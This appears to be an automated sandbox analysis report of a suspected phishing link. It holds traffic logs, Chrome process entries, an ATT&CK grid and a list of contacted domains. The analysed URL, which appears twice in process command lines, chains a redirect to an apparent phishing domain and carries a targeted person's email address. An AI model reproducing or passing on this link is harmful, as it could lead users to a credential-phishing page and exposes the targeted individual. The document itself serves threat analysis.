Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50785
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50792
Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
Source: unknownNetwork traffic detected: HTTP traffic on port 50828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 50639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50627 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50615 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50659 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 46.228.174.117:443 -> 192.168.2.16:50549 version: TLS 1.2
Source: classification engineClassification label: sus23.phis.win@72/290@642/547
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=10896 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=10896 --field-trial-handle=1972,i,2799304042676746572,4008595400502752359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
216.58.206.66
truefalse
    unknown
    um.simpli.fi
    34.91.62.186
    truefalse
      unknown
      tls13.taboola.map.fastly.net
      151.101.1.44
      truefalse
        unknown
        static.nl3.vip.prod.criteo.net
        178.250.1.3
        truefalse
          unknown
          global.px.quantserve.com
          91.228.74.159
          truefalse
            unknown
            ssum.casalemedia.com
            104.18.36.155
            truefalse
              unknown
              prebid.media.net
              34.120.63.153
              truefalse
                unknown
                i.clean.gg
                34.95.69.49
                truefalse
                  unknown
                  rtb.openx.net
                  35.227.252.103
                  truefalse
                    unknown
                    1.cpm.ak-is2.net
                    103.67.200.72
                    truefalse
                      unknown
                      cdn.w55c.net
                      52.57.67.153
                      truefalse
                        unknown
                        ybar-cn0b8nwv37report.wc.yahoodns.net
                        87.248.114.80
                        truefalse
                          unknown
                          crb.kargo.com
                          18.158.122.115
                          truefalse
                            unknown
                            cerebro-dns-report.wc.yahoodns.net
                            212.82.117.201
                            truefalse
                              unknown
                              dualstack.tls13.taboola.map.fastly.net
                              151.101.1.44
                              truefalse
                                unknown
                                mwzeom.zeotap.com
                                104.22.51.98
                                truefalse
                                  unknown
                                  ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud
                                  3.75.62.37
                                  truefalse
                                    unknown
                                    osmxq05cx.wc.06yahoo.com
                                    74.6.160.106
                                    truefalse
                                      unknown
                                      www.google.com
                                      216.58.206.36
                                      truefalse
                                        unknown
                                        sync.intentiq.com
                                        3.160.150.105
                                        truefalse
                                          unknown
                                          noa-atsv2.media.g03.yahoodns.net
                                          188.125.72.139
                                          truefalse
                                            unknown
                                            yahoo.com
                                            74.6.231.20
                                            truefalse
                                              unknown
                                              id.rlcdn.com
                                              35.244.174.68
                                              truefalse
                                                unknown
                                                match.adsrvr.org
                                                52.223.40.198
                                                truefalse
                                                  unknown
                                                  5k2ttewqa.wc.06yahoo.com
                                                  66.218.84.43
                                                  truefalse
                                                    unknown
                                                    dsp-cookie.adfarm1.adition.com
                                                    80.82.210.217
                                                    truefalse
                                                      unknown
                                                      match.prod.bidr.io
                                                      34.252.4.83
                                                      truefalse
                                                        unknown
                                                        ow-lhrc.pubmnet.com
                                                        185.64.190.84
                                                        truefalse
                                                          unknown
                                                          pagead-googlehosted.l.google.com
                                                          142.250.186.33
                                                          truefalse
                                                            unknown
                                                            creativecdn.com
                                                            185.184.8.90
                                                            truefalse
                                                              unknown
                                                              chidc2.outbrain.org
                                                              50.31.142.191
                                                              truefalse
                                                                unknown
                                                                google.com
                                                                172.217.23.110
                                                                truefalse
                                                                  unknown
                                                                  d1giprow6b9psh.cloudfront.net
                                                                  13.32.27.11
                                                                  truefalse
                                                                    unknown
                                                                    uip.semasio.net
                                                                    77.243.51.122
                                                                    truefalse
                                                                      unknown
                                                                      zeta-ssp-385516103.us-east-1.elb.amazonaws.com
                                                                      3.225.24.105
                                                                      truefalse
                                                                        unknown
                                                                        ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.com
                                                                        18.197.252.142
                                                                        truefalse
                                                                          unknown
                                                                          webhosting.icicidirect.com
                                                                          103.87.40.74
                                                                          truefalse
                                                                            unknown
                                                                            m.deepintent.com
                                                                            169.197.150.8
                                                                            truefalse
                                                                              unknown
                                                                              nld-prebid.a-mx.net
                                                                              163.5.194.36
                                                                              truefalse
                                                                                unknown
                                                                                edge-prebid-cdn.g03.yahoodns.net
                                                                                87.248.119.251
                                                                                truefalse
                                                                                  unknown
                                                                                  pixel-sync.sitescout.com
                                                                                  34.36.216.150
                                                                                  truefalse
                                                                                    unknown
                                                                                    pug-lhr-bc.pubmnet.com
                                                                                    185.64.191.210
                                                                                    truefalse
                                                                                      unknown
                                                                                      euw-ice.360yield.com
                                                                                      54.77.21.133
                                                                                      truefalse
                                                                                        unknown
                                                                                        ssum-sec.casalemedia.com
                                                                                        172.64.151.101
                                                                                        truefalse
                                                                                          unknown
                                                                                          presentation-ams1.turn.com
                                                                                          46.228.164.11
                                                                                          truefalse
                                                                                            unknown
                                                                                            widget.us5.vip.prod.criteo.com
                                                                                            74.119.117.16
                                                                                            truefalse
                                                                                              unknown
                                                                                              cadmus.script.ac
                                                                                              104.18.23.145
                                                                                              truefalse
                                                                                                unknown
                                                                                                hbx.media.net
                                                                                                23.212.88.20
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  iad-2-sync.go.sonobi.com
                                                                                                  69.166.1.34
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    am1-direct-bgp.contextweb.com
                                                                                                    208.93.169.131
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      nlb-dflb-496f722d06cc67e2.elb.eu-north-1.amazonaws.com
                                                                                                      13.53.196.230
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        pugm-amsfpairbc.pubmnet.com
                                                                                                        198.47.127.19
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          ybar-a5qcx9czh0report.wc.yahoodns.net
                                                                                                          68.180.134.137
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            ch-vip001.taboola.com
                                                                                                            141.226.124.48
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              contextual.media.net
                                                                                                              88.221.168.23
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                core.iprom.net
                                                                                                                195.5.165.20
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  tsdtocl.com
                                                                                                                  151.101.65.44
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    widget.nl3.vip.prod.criteo.com
                                                                                                                    178.250.1.9
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      id.a-mx.com
                                                                                                                      79.127.227.46
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        ad.mrtnsvr.com
                                                                                                                        34.102.163.6
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          sync.srv.stackadapt.com
                                                                                                                          54.175.124.176
                                                                                                                          truefalse
                                                                                                                            unknown
